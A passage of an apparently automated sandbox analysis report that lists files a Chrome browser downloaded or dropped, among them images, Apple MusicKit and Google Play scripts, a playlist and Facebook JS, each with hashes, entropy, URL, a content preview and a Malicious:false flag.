                                                                                                                                                                                                                                  SHA-256:6604C5A7BFA2E3F142248368D7C69135A8191D03C72D1024807150C32F4E8E55
                                                                                                                                                                                                                                  SHA-512:E99CFB370A8AF78ADA7252C5C28756731BBCDB28B71C7B671473C461BCF76A6147111D585A89631CEE3A0F693D45F7A9D3DC7462790EF8048631D96C457694D3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://js-cdn.music.apple.com/musickit/v2/amp/musickit.js?t=1726695429822
                                                                                                                                                                                                                                  Preview:/**. * IMPORTANT NOTE:. *. * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. *. * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */..!function(e,n){"object"==typeof exports&&"undefined"!=typeof module?n(exports):"function"==typeof define&&define.amd?define(["exports"],n):n((e="undefined"!=typeof globalThis?globalThis:e||self).MusicKit={})}(this,(function(e){"use strict";var n=void 0!==typeof self?self:this;function formatArtworkURL(e,n,d){return n=n||e.height||100,d=d||e.width||100,window.devicePixelRatio>=1.5&&(d*=2,n*=2),e.url.replace("{h}",""+n).replace("{w}",""+d).replace("{f}","jpeg")}const
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8934
                                                                                                                                                                                                                                  Entropy (8bit):7.965182039570643
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:3Z4s2q5VJRFFUJiGVshwmt+HuYt9r9otSEVEG5WPyhwuv:pzH5VJDFyissTEHNtAt/xOyZv
                                                                                                                                                                                                                                  MD5:64B028ABB91D25F47EAEA97E508222F3
                                                                                                                                                                                                                                  SHA1:3D02DF29E5484325376EE870196B28BB94611707
                                                                                                                                                                                                                                  SHA-256:0AED9BAD4388F2885A581E6FF389A157ED4AB1880A0C4D17DA70B8AD8CFBFFA7
                                                                                                                                                                                                                                  SHA-512:9510924B8FD97D15FAABDF99E0DEF9F4FF88A200122D8823BF5F49B1DBCB373C0C621E1A85A4AE3838DF6E47AE936D613A354C1D10C99C291E7BF782D3842D89
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF."..WEBPVP8X........?..?..VP8L."../?...M0h.H..................-...[..8$.#.VN.[;..$9.l.Q..0gh.6...$%..=..?:..F...pw.?.....q.....~.~G>.S...WG..........U...%.$....k.{.S"P.V...V...T.......lG.......U....0.'.8B.....w....$0...x$m..S.r...J.m.c..o.m.m.=..S..v.U1...7.h[[.H.u]7D..Vf..........9bf.'......1C33w..z....J.e.%[.E.....&E.$....GDfVeU..,.<+..I...,.t.333j'1.....3..U....nf....Pg.S...!\G.ex...{..?"...#w\...zi.>..Se.{f.Lev..(..,h.r.fkdTQ.....3i)=.U...vWx]DO.Gy.&..........:.E..:....+....&..:...S.....D!.#..&.....Z.9.....L..6.mr.z..?...rQ..g( $...p.aY.^M.h.. ..u.;q$N.VeN..a.....f,m..S..........hAv.....A..........v#d.sd. ...)..H<b.H....e...c.F.%....@c. P...i`+..FKh+..)R.8.N..m.u.A..!@"...Z.*...).ET2Sb..c9..'&..........8.$(....-(.A..Z%..Xc...j..ua..@..e.[.dY.<.0.Dh.I=e#..+..X(38^.......i....3...n.y.4....j.& V...Z..N.uc.p..\.....X6..* .;Qn./..-.....;..e...z..*....r...3-H..bI".'..e>a., ...@...c.e.=...0..xd<..r.....[.c.D..$.."J.H6..N...X.|4...tKn.t..Y.G.<w
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 416x234, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):23680
                                                                                                                                                                                                                                  Entropy (8bit):7.9913839102467685
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:384:XGv70G033zFQvH8VfKJ+A98qxypMFz2k3Qmk3v+erwICKWhMugnCW:2vAH33zF7BKA0yp82kAd/Frwoq/gCW
                                                                                                                                                                                                                                  MD5:DA50F8F49D8E88F6E364E911B1BF4467
                                                                                                                                                                                                                                  SHA1:8770896A042707E886621971CADFABD48D1D4317
                                                                                                                                                                                                                                  SHA-256:30364A07D3B398559DF76948F9645391BBD6F2F4348F28E9F31F8981B228F775
                                                                                                                                                                                                                                  SHA-512:5B13DF62EF683B3ABF012434BCA37BEFCF400039677C01D951E76D6468693F5243E0479FBE4646AE1CBDBCFDD766C16C9FB6CA33A173F8D3D42DF695C643DF79
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/dl3h4f8JvKbmL4jtmqiTWof6bU6W2mKCzOmAHgdf0PUCanyZ0qQ19oXqRgn79R8qXKwV=w416-h235-rw
                                                                                                                                                                                                                                  Preview:RIFFx\..WEBPVP8 l\..0/...*....>]&.E..!.;&<8...e.B.Y}...|...<../..Q.?....z_3.......W././p/...|.}l~.z..s......./..._.j~.?......c...._..p.._.?...~.|,.l.....;.3...G....P....~i.7./..7._.....?S_......<..z...?.o...w..3.?P.o...|..._i.3._......~............w.......:>J..._._.?...?..j...k.s.7.....?3=.~....o....._...........s..G.o.#.zxl<a..j.....u*{.P......V85^..Z.................R..M|..}...O.q.!.6..4o.+.+./..1..(..G1.-.uw....h...!....Vl.#V..9.........H...R....,2x...1J....r..Q.$..n......c..#"...n....[...D....f/.*./....o..dbv.....,..H.9..#.+.K...G.|..G....A.!.H...?....s.......}.m..S.V..:..i.Sa.]|.0.pf.I7a.t j.r.,.....X%..z..|.....;...S...e...#O...p..1..M.9rXK.....>.5F.kY+mSF..0....4u$.8...w...E.j .t..%........"...(....G.}.@.R.....1_.TyJf.......Y=}..E.5:....]NL..7K.....&..*...<..._{yd.hi.o...>KcQ{...Zm..iQ..NJ'..m2f...4....n...[.U..qY.)..#.dD.w....{.u.>,9.R.j..'kr.u....N......9..nM...Wkoq..+r^eE.o.. .A.M?t.....sf.]*..{..b_....g;..Y.M...%.../zZ
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 306 x 90, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3754
                                                                                                                                                                                                                                  Entropy (8bit):7.891960792073307
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:pVR8tAXdv46Nbd/o5AQ1MyzREs9wrTirdu:/RfvjNJQ5AJUEsVo
                                                                                                                                                                                                                                  MD5:4B70F6FAE44727678540B68E876908B1
                                                                                                                                                                                                                                  SHA1:D5A23520ACDF18636380E1A88D3DE2A1EFBF6CE1
                                                                                                                                                                                                                                  SHA-256:14C09561486BA385A8A62BC0A8B41E03638A6334648113A7F28BE47271ECCB5E
                                                                                                                                                                                                                                  SHA-512:F00497BBF393F680C0352C4485E74FC7519557EC6DAE6FEDEEB206B094AC849C1FBCCD62DD5943FC8B40247245065FD81E170846BC0DA8A3FC33E332352EC7C3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:.PNG........IHDR...2...Z.......*t....PLTE.........................................................ccc...............777mmm.........rrr......\\\.........)))...KKK...222.........@@@......$$$......bbb.........kkk000```........FFF........[[[PPPhhh............"""...:::......YYYppp555'''... {{{...~~~......HHH...VVV............yyy......................SSSuuu.............xxx...999...MMM___fff.........%%%.........<<<BBB+++444>>>........+....%tRNS.,......} .......H..........8........lO,.....IDATx...K..@....tq.A.u@.Q.u.....Xig..Kj..R.....}..-..IRg....b.[....V..ls.;k.X[.......5...8...F..;f.Q..tBv..U.......VotE(...F7Db.7j`.P....~2&c...r..woOi.....}.{...G...B4.a.D.W..g..%.X.S=WD.V.Zm....!$.@4.v.5.......mx.b&..u..3......(....+..o2......7....!...S.a<.O.P....;.I#.....c..w..$.~A2y...XI695=3. ._G.7...A.Y..-%.C...h.H6..?Y.u.'C....R.=....O$2.`!2..%...S.E.M48V......<.,.G....Y.0..Z.L....~/..any`...H.+.H,.l.g-,A#.....~R2..s>..d...`x.Y.2.nr..8{..s...ry...,.......}..:..>.%[8`VT.0Lv.H&.a
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):11794
                                                                                                                                                                                                                                  Entropy (8bit):7.981205654531022
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:h0QcbTomyT/d9M2QYEcUc6GgVVYBOLMwHCG+1vm3cutU41HVHvEbN9Oslv0cE8Bu:h0smyzw2QPJGgz9V+5m3cwxzHcbNNlvw
                                                                                                                                                                                                                                  MD5:66E3AA84063184FE950C811E70715E7E
                                                                                                                                                                                                                                  SHA1:3E71B81A617DCBEF5939E1DABC487A8FF1F06996
                                                                                                                                                                                                                                  SHA-256:9E79717DE830CE55822C38DA925539643224A08C1B7C8F7B21F92CE0EA77DCEB
                                                                                                                                                                                                                                  SHA-512:642E18C209D4060D481E947B4FE3C8C5615EAAEA1F4EC98E82EDC8D4B488F07714A68FC617DAD453959A2D8D3C590FA170263C526FF2C1675EA2C5E105BF1944
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://is1-ssl.mzstatic.com/image/thumb/PurpleSource211/v4/43/ca/45/43ca45f2-1eb7-fd56-ce61-157e37441ff9/c556b652-5cf7-4c3d-8cfe-b972766129b0_2_iOS_6.7.jpg/230x0w.webp
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8X..............VP8 .-.......*....>.L.I$"(.)]...D.....>...#.z?._....4........s..././.v..}..^<.j.......r.....[......=j..~.............._z...........+....A}.....U.<.........>C.a.'./.?....J..v....B=..../.OL...".;....o............O...7.....>......u....|wp.....Z.'.Hj.Y..Q.-4!....r.....X.E..Z....t...[B^-q.R..7..{..Z.@.B..g+.K........w.Y^...V[...<...\....@_.".-..A.Y@^.-...m.`..%q....M2....{n..a.3....b..C....}..x\$?.3..8T..$b..z.!B......4.3..L.k.T..G..s>.3R.hA.P.V..G..\M...a.MI]a.,.....k.."............#.;............lc.../...._.,TW...a_...o..._...Z........[H.f.3...W..L..6..7.3. .T..o..XF.&.3..Z.a.t.b#...V..G...`l..nB.....=.b.>....!.m.;1QA..M}....\"8Od1..Z]...U."$m.~.;......%ue...\....C..*....1.$.O...W.Z..18..4...m;;..z..o]....qT.....)I.O..@H.@&..i.j.d.6..Rt*UW*e..`.e.......q2.(.r.k.*.hB.|X)*.z._......-.-...SHT....^\b..."....r ..ZU...x..Y..6..A.Y.......k.V.Q.k...a.V..H..gT...u..9....b.~.1..[8...M........)...R..QsV....m..y.[....@.{
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):200
                                                                                                                                                                                                                                  Entropy (8bit):6.878063612294382
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:wAi1Z6iB1toFkCoH+GN2jQPRwS9gJY5derhz6:wd1Eqt8qNN2jaRxgJY5Ec
                                                                                                                                                                                                                                  MD5:26AE874F3B7051BC5B112960C251080F
                                                                                                                                                                                                                                  SHA1:1D6B38F7FE58DC79CC66CC0A3EE42CAAA096B686
                                                                                                                                                                                                                                  SHA-256:8C66B3CB207515328AC21BDBBDA1B90A74D7CAC66267352048BFD7E4E1EFE627
                                                                                                                                                                                                                                  SHA-512:88DBFE63B9A7374528308BD4AC891535C310FFC2277C3A44004772ACCEA7115D8A1DF77ECB56EDF573000DF4AFC79E7E9524B4FB8C8E8DBAC2384860306F0C31
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/iFstqoxDElUVv4T3KxkxP3OTcuFvWF5ZQQjT7aIxy4n2uaVigCCykxeG6EZV9FQ10X1itPj1oORm=s20-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../....58l.F....._..2.. .p[[..L.nx.......!V.....R..A...........x....>b.z[..j{....%~.{..~+N.sUy.G.....D...x.poN...,`....>....o...Z.*....u...,}...^..W...v..Z.u..^.`dg`j.|...q....
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.170459334919915
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnJWeZozcAuGNG/QVILhiKUDSLzwQRaNw6JpyxZRNlad0:kRZTFJfaI/AIliKM4wkbRN20
                                                                                                                                                                                                                                  MD5:5DE88881B7071B027849EEE2E5356089
                                                                                                                                                                                                                                  SHA1:0919CB1A09CA547C9F2ECB996A64B69BE0BFDD33
                                                                                                                                                                                                                                  SHA-256:CF62CA3B87A2181A4287D118E772F0EC289B402C46054C7B520178DC40196828
                                                                                                                                                                                                                                  SHA-512:45F181E96DDF688EAC64DEA743A19297962375A20625B27DDE43CC941C79A3BFCD559B021E52551ABF3290E3DD57EA2C8A327D8737BBAAB58BE059121C67E0A5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("LcQwud");._.qr(_.bEa,class extends _.rr{constructor(a){super(a.ta)}H(){return"LcQwud"}N(){return!0}Xa(){return _.bic}});_.$q.LcQwud=_.KQa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.187754044897426
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnAxSoLEOAuGNG/QVIKy5hiJGvWv6nwQRaNw6JpyxZRNlad0:kRZTFOSpI/AI9ieWv7kbRN20
                                                                                                                                                                                                                                  MD5:5E025E86D85D2F5D1456BB61623943FC
                                                                                                                                                                                                                                  SHA1:A9815A50C93942837148FBBF4D99FDAB0B56DFC6
                                                                                                                                                                                                                                  SHA-256:11DF2F37C88005DA98E72FD61F6654CF84E01B08A82AFDD2935E23C192F3EBBD
                                                                                                                                                                                                                                  SHA-512:A24D6D468E9BC32034E13237A5B06DD641C829557CD38822A301AA83F5648F087C9C2CEA01223CE3A54FA02AAEABE3751693E7AA8280AB11922FEBC279A1EA01
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("ElYdAc");._.qr(_.ZBa,class extends _.rr{constructor(a){super(a.ta)}H(){return"ElYdAc"}N(){return!0}Xa(){return _.sOc}});_.$q.ElYdAc=_.oRa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                                                                  Entropy (8bit):5.238929093641439
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnitIoDblAuGNG/QVIBMZKhitiGwQRaNw6JpyxZRNlad0:kRZTFiCwkI/AIMsiN8kbRN20
                                                                                                                                                                                                                                  MD5:56A9F17F41DB5FBB55F93B77AFA5D67D
                                                                                                                                                                                                                                  SHA1:7A6FBED6606E60FC2BCE5EBFFEE4C36E7D48EC01
                                                                                                                                                                                                                                  SHA-256:F0FBD3006865F8A27D576EC26911913FE621B8A4E74B092D982D9371F50BDE12
                                                                                                                                                                                                                                  SHA-512:06AE4AFB3582D0C4258C95017D58D1B64519556FB91D60244A5A021484DFC157AA5851E436807D505E8575C261F21AAA3DC34460B57AEB5E15CD40EB1905DFAD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,C7e1Kc,CKm2Wb,EEDORb,EFQ78c,ElYdAc,FoxcOd,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PZ1hre,PrPYRd,QIhFr,RBsfwb,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,UUJqVe,UZStuc,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,g6aYuf,gKWqec,gychg,hKSk3e,hc6Ubd,iAQMie,iLGjNb,kJXwXb,kWgXee,kjKdXe,kpVlPe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,mmmrlc,n73qwf,oEJvKc,ovKuLd,pCKBF,pQUyNd,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qczJ2b,qqarmf,qyd4Kb,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,xii62b,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=grWkAb"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("grWkAb");._.qr(_.Rza,class extends _.rr{constructor(a){super(a.ta)}H(){return"grWkAb"}N(){return!0}Xa(){return _.Yvc}});_.$q.grWkAb=_.UPa;.._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                                                                  Entropy (8bit):5.188252616618527
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvncbXfZoVEOAuGNG/QVIgKiZhi/6epYy/fgSewQRaNw6JpyxZRNlad0:kRZTF4XRmII/AIPiziUgfXe8kbRN20
                                                                                                                                                                                                                                  MD5:E4F7EC2E9A31D06BCE58A84B2FF891CF
                                                                                                                                                                                                                                  SHA1:1817AA0CDA0AF5BA0BADF0CD0317CD9C44B7D261
                                                                                                                                                                                                                                  SHA-256:29B5F97B2EE9B95B27C7FFA0A16DECCDC03EBF25FEAC784559BC1E1A2830CE5D
                                                                                                                                                                                                                                  SHA-512:39E0484A8D631AE08074E2CCFF45CB53A8EB5C3B0BBDC564DD489E00F611BE49246A1ADFEF37B8D6619BA2E1D6F345EAB3996F85726308882FA6538A4BF49C72
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("YTx6oe");._.qr(_.DBa,class extends _.rr{constructor(a){super(a.ta)}H(){return"YTx6oe"}N(){return!0}Xa(){return _.l6}});_.$q.YTx6oe=_.cA;...._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:M3U playlist, ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):789
                                                                                                                                                                                                                                  Entropy (8bit):5.334449178191508
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:PNfsAAjdxPVGIdxeTdxly7dxPdx76dxisdxI5:lfRcdpcIdATdwdVdZ6dssdM
                                                                                                                                                                                                                                  MD5:BFD437AC6F199108032972C3BD8173CC
                                                                                                                                                                                                                                  SHA1:E934C27E6207D4C316EC8313C94B898452E8613B
                                                                                                                                                                                                                                  SHA-256:1E3746CB4C2F76B60E1F76B6828F1BC6C19B9795330CB6E7FFBA4C775C30E82F
                                                                                                                                                                                                                                  SHA-512:8CB2FC52CF8C65D50F15913C37ACD30B11324F0845C07C4DED62B566D2B56005C46C48C1DE4FC46611028B10BC9602ECDB8CB21F2B9FDA6C4BCA02DFCF002B05
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/92/6e/dc/926edca5-b31b-a5ab-a276-61c326313ac5/P875466468_Anull_audio_en_gr128_mp4a-40-2.m3u8
                                                                                                                                                                                                                                  Preview:#EXTM3U.#EXT-X-TARGETDURATION:6.#EXT-X-VERSION:7.#EXT-X-MEDIA-SEQUENCE:0.#EXT-X-PLAYLIST-TYPE:VOD.#EXT-X-INDEPENDENT-SEGMENTS.#EXT-X-MAP:URI="P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4",BYTERANGE="822@0".#EXTINF:5.99075,..#EXT-X-BYTERANGE:95176@822.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXTINF:5.99075,..#EXT-X-BYTERANGE:102413@95998.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXTINF:5.99075,..#EXT-X-BYTERANGE:97049@198411.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXTINF:5.99075,..#EXT-X-BYTERANGE:96885@295460.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXTINF:5.99075,..#EXT-X-BYTERANGE:102639@392345.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXTINF:0.11014,..#EXT-X-BYTERANGE:367@494984.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXT-X-ENDLIST.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):102
                                                                                                                                                                                                                                  Entropy (8bit):4.921030304008144
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:JSbMqSL1cdXWKQKzaXORdQzXWaee:PLKdXNQKGeOL
                                                                                                                                                                                                                                  MD5:59EE3965FCB16F88E9BDC20B9CD8612E
                                                                                                                                                                                                                                  SHA1:3D93A27E4DAC9DDA01DC5BBCCA9E1F53E827DAF2
                                                                                                                                                                                                                                  SHA-256:020A92F2FB27981D1398F916AE17400F8F11473962EBD858B7BF6901814EDD7B
                                                                                                                                                                                                                                  SHA-512:3E4C07D9CE3DEDE2998A59C32A3FE12D781AAE33C4AFE8D2B9B0D12C18EB96257373098497B5F3C909EC1EDE64FEB4B4074DBDB9678B4D6B019CD64360222849
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:importScripts('https://www.gstatic.com/recaptcha/releases/xds0rzGrktR88uEZ2JUvdgOY/recaptcha__en.js');
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (20738)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):86597
                                                                                                                                                                                                                                  Entropy (8bit):5.7667639352954785
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:1S6F7vZeqFfh5kVEgpEI9Ps9Zlv4o5Iq7mGsq53Jttzp5QOyo:1S6F7vZeqNh5wEqFPKlvB9go
                                                                                                                                                                                                                                  MD5:6B7F0B1E0AF3E89F3D580DFB2E84082B
                                                                                                                                                                                                                                  SHA1:C3352E72C4CD682DF4B4DD8F14AD013578FC04CB
                                                                                                                                                                                                                                  SHA-256:1B03380EF0ED1C355563B423B11292507D9B0DF47FD1110D1E20A2A370AEB580
                                                                                                                                                                                                                                  SHA-512:164E81E1A9F7D6DC82AE2E627202908AB9ED3EC8EA2F9CDFD94206D8A19808A7DBEE461B303F41E45D95E7867327A5BEC17B569382008A7A427F4C639772C89F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iOos4/yj/l/en_GB/kM7FcjXTwOM.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdsGetAdsHelpTrayOpenOnClick",["AdsHelpTrayUIActions","AdsHelpTrayUIProvider"],(function(a,b,c,d,e,f,g){"use strict";function a(a){var b=a.dialogWidth,e=a.forceNewWindow,f=e===void 0?!1:e,g=a.helpCenterID,h=a.source,i=a.onClick;return function(a){var e=f;if(b!=null){var j=b+c("AdsHelpTrayUIProvider")().helpTrayOpenWidth*2;window.innerWidth<j&&(e=!0)}e||(a.preventDefault(),a.stopPropagation(),d("AdsHelpTrayUIActions").pushCMSIDToHistory(g,h));i&&i(a)}}g["default"]=a}),98);.__d("AdsLearnMoreStrings",["fbt"],(function(a,b,c,d,e,f,g,h){"use strict";a=h._("Learn more");b=h._("Learn more");c=h._("people");d=h._("Learn more about Meta placements");e=h._("Learn about audience.");f=h._("Learn more about attribution settings");g.INLINE_LEARN_MORE=a;g.STANDALONE_LEARN_MORE=b;g.INLINE_PEOPLE_TEXT=c;g.PLACEMENTS_LEARN_MORE=d;g.INLINE_LEARN_MORE_ABOUT_AUDIENCE=e;g.INLINE_LEARN_MORE_ATTRIBUTION_SETTINGS=f}),226);.__d("GeoInvertedThemeProvider",["GeoPrivateInvertThemeContext","
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):8110
                                                                                                                                                                                                                                  Entropy (8bit):7.965876040183802
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:34J/KsYwindEURO+mGoJdHpEi2vXNJU9ihYMM4hnZQ:34JhJinOIO+mRdHWi4wPTR
                                                                                                                                                                                                                                  MD5:99845E7231464904E41907E812C47242
                                                                                                                                                                                                                                  SHA1:C3A70E863FC8067CA68BFDEA06E2F3968AB2E596
                                                                                                                                                                                                                                  SHA-256:D5AFD12A59DB14ED22BFBCF55590859F5547E4A98B018542BD06464711CC5AB6
